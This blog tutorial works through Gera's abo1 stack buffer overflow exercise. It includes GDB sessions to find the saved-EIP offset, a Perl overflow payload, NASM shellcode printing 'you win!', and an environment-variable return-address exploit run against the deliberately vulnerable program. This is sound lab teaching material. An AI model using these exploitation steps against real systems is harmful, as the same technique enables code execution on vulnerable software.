Insecure Programming by Example: Advanced Buffer Overflows 1

Introexecuduction

Ok, after a nice break, I’m ready to…break :-). I have a couple of Python-related posts in my docket, but today we’re going to start work on the next exploit exercises by Gera in his Insecure Programming by Example series, Advanced Buffer Overflows! I hope they aren’t too advanced. This should be refreshing to write about, because I haven’t done any of these yet. On to the code!

Gera says:
Advanced Buffer Overflow #1

blind obedience

What would happen if you store 512 characters where there is only space for 256? You may claim that you can’t, and you’ll be right, but still, there are situations that, unconsciously, you tell the micro to do so, and he can only but obey you… and he’ll do his best without thinking of side effects. Now is when we get technical, fasten your seat belts, this turbulence will last forever.

What defines a buffer overflow is the copy of a memory region into another region not big enough to contain it.

/* abo1.c                                       *
 * specially crafted to feed your brain by gera */

/* Dumb example to let you get introduced...    */

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}

Gera continues:
This is a good and simple abo: on execution this program will copy the contents of argc[1] *1, whatever it is, into the reserved 256 bytes named buf, strcpy() will not do any checks of any kind, it will just copy bytes from source to destination, from argc[1] to buf, until it finds a zero. Here, a chance is given for us to supply a longer-than-expected argc[1] to write in memory past the end of the reserved space named buf. Why is this a security problem? becouse we can change data that we shouldn’t be able to, and usually, this data we can change has a very special meaning for the micro, and by exploiting this meaning, we can confuse the micro and make it do what we want. That’s the secret, go get a debugger, a compiler, and all the tools you think you’ll need, and find out what’s the data after buf and why it’s so important to be able to modify it.

1 – argc and argv are just names for main’s arguments, they just name chunks of bits in memory, their names are not meaningful by their own but for their context.

On a side note, I wasn’t sure at first why this compiles correctly without an #include (strcpy() is declared in <string.h>), but older C rules allow calling a function that was never declared, so even a really old version of gcc will at most warn about it and still build a working binary. Either way, the notes that Gera provides are well worth reading and understanding. This is actually a fairly easy piece of code to exploit, given what we’ve worked with previously in the stackN.c series. We’ll actually re-use our shellcode from that series to print out “you win!” upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier where I delve into the generation of the shellcode we’re going to use here.

Exploitimitation

The only change of note for this vulnerable piece of software is the use of the strcpy() function. You may remember we discussed earlier why this function, along with gets() and a bunch of others, is not a good idea to use. It is strcpy() that allows us to overflow the buffer, because it does no bounds-checking against the size of the destination. It just copies whatever you give it, byte by byte, until it reaches a zero byte in the source. That unchecked copy can be used in the same way we used gets() earlier: to overwrite other areas on the stack (or beyond), gain control over EIP, and hence control program execution.
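To make the "no bounds-checking" point concrete, here is a minimal sketch of roughly what strcpy() does internally, next to a bounded variant that refuses oversized input. Both naive_copy() and bounded_copy() are names I made up for illustration; neither is part of libc or of Gera's code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Roughly what strcpy() does: copy until the source's NUL byte,
 * with no knowledge of how large dst actually is. */
char *naive_copy(char *dst, const char *src)
{
    char *p = dst;

    while ((*p++ = *src++) != '\0')
        ;
    return dst;
}

/* Hypothetical bounded variant: refuses input that does not fit,
 * counting the terminating NUL. Returns 0 on success, -1 otherwise. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    assert(dst != NULL && src != NULL);
    len = strlen(src);
    if (len >= dst_size)
        return -1;              /* would write past the end of dst */
    memcpy(dst, src, len + 1);  /* len bytes plus the NUL */
    return 0;
}
```

With a char buf[256], bounded_copy(buf, sizeof buf, argc[1]) would reject anything longer than 255 characters, which is exactly the check abo1.c is missing.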

What we’re going to do is this:

  1. Determine the location in memory of the variable buf.
  2. Determine the location in memory of the saved EIP within the stack frame for the call to the main() function, using our debugger GDB.
  3. Determine the offset (number of bytes) from the start of buf to the saved EIP by subtracting the beginning address of the buf array from the address of the saved EIP. It’s worth noting here that the stack grows from higher addresses to lower addresses (whereas the heap grows in the reverse direction), but a buffer is still filled from low addresses to high just like anything else, which is why writing past the end of buf reaches the saved EIP above it. This is something that will take you a while to get into your head permanently. A good (but old) document describing this is at tldp.org, and a thorough overview can be found at linux-mm.org.
  4. Through the first command line argument (a.k.a. argc[1]), send data which will hopefully cause the program to print out “you win!” when main() returns through the overwritten saved EIP.

Let’s get started by compiling the code and examining it in GDB to determine the locations in memory we are concerned with. I will be compiling the binary with the -static option, which links the libc code the program calls directly into the binary instead of resolving it from a shared library at run time. It makes things a bit easier to see sometimes in GDB, but do whatever works for you.

hacking@hacking:~/InsecureProgramming $ gcc -ggdb -static -o abo1 abo1.c
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) list
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) backtrace
#0  main (argv=2, argc=0xbffff864) at abo1.c:10
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/8x buf
0xbffff510:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff520:     0x41414141      0x41414141      0x41414141      0x41414141

The lines to look at in the output above are the "Saved registers" line, which puts the saved EIP at 0xbffff61c, and the x/8x dump, which puts the start of buf at 0xbffff510. The dump also shows that once strcpy() has returned, the buffer does indeed contain a bunch of “A” characters (0x41). Now that we know where everything is, we can do a bit of arithmetic to determine our offset, and then we can get along to deploying our simple shellcode to take control of the EIP register and make it do what we want.
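The arithmetic itself is a single subtraction. Here is a small sketch of it in C, using the addresses GDB reported on my machine. The macro names and offset_from_buf() are just labels I picked, and the addresses will almost certainly differ on your system.

```c
#include <assert.h>
#include <stdint.h>

/* Addresses copied from the GDB session above; they are specific to that
 * machine and build and will differ elsewhere. */
#define BUF_ADDR        0xbffff510u
#define SAVED_EBP_ADDR  0xbffff618u
#define SAVED_EIP_ADDR  0xbffff61cu

/* Bytes from the start of a local buffer to a higher stack address. */
uint32_t offset_from_buf(uint32_t buf_addr, uint32_t target_addr)
{
    assert(target_addr >= buf_addr);
    return target_addr - buf_addr;
}
```

offset_from_buf(BUF_ADDR, SAVED_EIP_ADDR) comes out to 268: the 256 bytes of buf, 8 more bytes the compiler left between buf and the saved EBP, and the 4 bytes of the saved EBP itself.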

hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/x buf
0xbffff510:     0x41414141
(gdb) print 0xbffff61c - 0xbffff510
$1 = 268
(gdb) quit
The program is running.  Exit anyway? (y or n) y
hacking@hacking:~/InsecureProgramming $ perl -e 'print "A" x 268 . "BBBB\n";'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, main (argv=0, argc=0xbffff764) at abo1.c:10
10      }
(gdb) next
0x42424242 in ?? ()

Now that we have proven control over EIP by overwriting the saved EIP with “B” characters (0x42), we can deliver the shellcode as described in previous tutorials.
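The Perl one-liner above is all you really need, but the same payload layout can be sketched in C: filler bytes up to the offset, then the 4-byte value that should land in the saved EIP, written low byte first because x86 is little-endian. build_payload() is a hypothetical helper of mine, not something from Gera or the book.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fill `out` with `offset` filler bytes followed by `ret_addr` in
 * little-endian byte order (x86), then a terminating NUL.
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_payload(char *out, size_t out_size, size_t offset,
                     uint32_t ret_addr)
{
    size_t i;

    assert(out != NULL);
    if (out_size < offset + 4 + 1)
        return 0;
    memset(out, 'A', offset);
    for (i = 0; i < 4; i++)
        out[offset + i] = (char)((ret_addr >> (8 * i)) & 0xff);
    out[offset + 4] = '\0';
    return offset + 4;
}
```

Calling build_payload(p, sizeof p, 268, 0x42424242) reproduces the 268 "A"s plus "BBBB" string used in the session above. Keep in mind that an address containing a zero byte would cut the string short, since strcpy() stops copying there.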

Whiskey Tango Foxtrot?

There is one problem left to solve: it appears that the variable addresses during a regular run of the program differ from the variable addresses while in GDB. Since this code doesn’t print out the variable addresses at runtime like the stackN.c examples, and since we don’t want to modify the source to do so in the spirit of the exercise, we have to find another reliable way to exploit the program. There is a trick we can employ here: place our shellcode into an environment variable, and then use the getenv() C library call to determine the location of that environment variable in the program’s memory. Any program executed from Bash (or any shell, really) receives a copy of the shell’s exported environment variables (viewable with the env command), and those strings sit in the new process’s memory near the top of its stack. Once we have the location of the shellcode in the environment variable, we can overwrite the saved EIP with that location and successfully exploit the program. This technique is described in greater detail in Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson (if you can’t tell, this is a pretty good book). Indeed, the getenvaddr.c we’re going to use below is provided for free from the book’s website. But if you’re following along with me here, you should really read this book in its entirety.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
	return 0;
}
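The "adjust for program name" line is the only non-obvious part, so here is that adjustment pulled out into its own function as a sketch. adjust_for_name() is my own name for it. The factor of two is simply the rule getenvaddr.c uses, so treat it as an assumption that holds on the kind of system the book targets rather than a guarantee.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Shift an address observed in one program by two bytes for every
 * character of difference between the two program names, mirroring the
 * adjustment in getenvaddr.c. The factor of two is the rule used there;
 * it is not guaranteed on every system. */
uintptr_t adjust_for_name(uintptr_t observed, const char *self_name,
                          const char *target_name)
{
    long diff;

    assert(self_name != NULL && target_name != NULL);
    diff = (long)strlen(self_name) - (long)strlen(target_name);
    return observed + (uintptr_t)(diff * 2);
}
```

As a made-up example: if a helper invoked as ./getenvaddr (12 characters) saw the variable at 0xbffff9d5, the prediction for a target invoked as ./abo1 (6 characters) would be 12 bytes higher, at 0xbffff9e1. The name has to be exactly what you will type to run the target, since a different path changes the length.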

We can then load our shellcode into an environment variable and overflow the buffer with the determined address of the shellcode repeated over and over, so that one of the copies lands on the saved EIP, which provides us with much win. I hope this was a pretty informative post, and I really hope you all who are following along (all two of you) consider purchasing these books I’m outlining, they are pretty invaluable as a central collection of knowledge. On to the next challenge!
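Repeating the address only works if one of the copies lines up exactly with the saved EIP slot. Here is a quick sketch of that check, assuming 4-byte addresses written back to back from the start of buf. repeats_hit_slot() is a hypothetical helper, and the numbers in the note below are the 268-byte offset found earlier and the 75 repetitions used in the session that follows.

```c
#include <assert.h>
#include <stddef.h>

/* Returns 1 if writing a 4-byte address `repeats` times from the start of
 * the buffer places one whole copy exactly on the saved EIP slot that
 * begins `offset` bytes into the buffer, else 0. */
int repeats_hit_slot(size_t offset, size_t repeats)
{
    const size_t word = 4;

    assert(repeats <= (size_t)-1 / word);   /* keep repeats * word from wrapping */
    if (offset % word != 0)
        return 0;                           /* copies would straddle the slot */
    return repeats * word >= offset + word;
}
```

With an offset of 268, which is a multiple of 4, anything from 68 repetitions up covers the slot, so 75 copies (300 bytes) leaves a little slack. If the offset were not a multiple of 4, you would need a few filler bytes in front to realign the copies.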

hacking@hacking:~/InsecureProgramming $ cat abo1_shellcode.s
BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
pop ecx           ; Pop  the return address (string ptr) into ecx.
xor eax, eax      ; Zero  out full 32 bits of eax register.
mov al, 4         ; Write  syscall #4 to the low byte of eax.
xor ebx, ebx      ; Zero out ebx.
inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
xor edx, edx
mov dl, 8        ; Length of the string
int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
dec ebx          ; Decrement ebx back down to 0 for status = 0.
int 0x80         ; Do syscall: exit(0)

one:
call two   ; Call back upwards to avoid null bytes
db "you win!" ; The 8-byte string; no newline or carriage return follows.
hacking@hacking:~/InsecureProgramming $ nasm -o abo1_shellcode abo1_shellcode.s
hacking@hacking:~/InsecureProgramming $ hexdump -C abo1_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking:~/InsecureProgramming $ export SHELLCODE=$(cat abo1_shellcode)
hacking@hacking:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=? Y1?? 1?C1?? K??????you win!
hacking@hacking:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo1
SHELLCODE will be at 0xbffff9e1
hacking@hacking:~/InsecureProgramming $ ./abo1 $(perl -e 'print "\xe1\xf9\xff\xbf" x 75;')
you win!hacking@hacking:~/InsecureProgramming $
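One last sanity check worth sketching: both the environment variable and the strcpy() argument are C strings, so a single zero byte anywhere in the shellcode or in the address would truncate them. The bytes below are copied from the hexdump above, and contains_nul() is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>

/* The 34 assembled bytes from the hexdump above. */
const unsigned char shellcode[] = {
    0xeb, 0x13, 0x59, 0x31, 0xc0, 0xb0, 0x04, 0x31,
    0xdb, 0x43, 0x31, 0xd2, 0xb2, 0x08, 0xcd, 0x80,
    0xb0, 0x01, 0x4b, 0xcd, 0x80, 0xe8, 0xe8, 0xff,
    0xff, 0xff, 0x79, 0x6f, 0x75, 0x20, 0x77, 0x69,
    0x6e, 0x21
};

/* Returns 1 if any byte in data[0..len) is zero, else 0. */
int contains_nul(const unsigned char *data, size_t len)
{
    size_t i;

    assert(data != NULL);
    for (i = 0; i < len; i++) {
        if (data[i] == 0x00)
            return 1;
    }
    return 0;
}
```

contains_nul(shellcode, sizeof shellcode) returns 0, which is what the xor/mov al and jmp/call tricks in the assembly are for. A plain mov eax, 4 would assemble to b8 04 00 00 00 and fail this check.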

6 responses

  1. Great posts re: insecure programming. I noticed you mentioned abo2 on twitter and are having trouble. I am still learning this stuff, but I think exploiting the writable .dtors section is where to go with this.

  2. I stand corrected — the GOT is probably the correct way to do this. Like I said, still learning. 🙂

    1. Haldo,

      Sorry I hadn’t responded, didn’t see these until getting in to work today, thanks for reading :-). It’s interesting, I came across the PLT/GOT in the book I keep plugging (Hacking; the art etc.) at the end of the exploitation section. I haven’t had any time to play lately (soon, hopefully) but it seems that a stack overflow wouldn’t be well suited to write to the PLT or the GOT due to their positions in memory. Not sure, but it seems those techniques are typically tied to format string bugs and their inherent (apparent, since I’m still learning too) ability to write to arbitrary memory addresses.

      I should have a post on this in a few days (_if_ I am successful). Thanks again for reading, what’s your Twitter u/n?

      –Mike

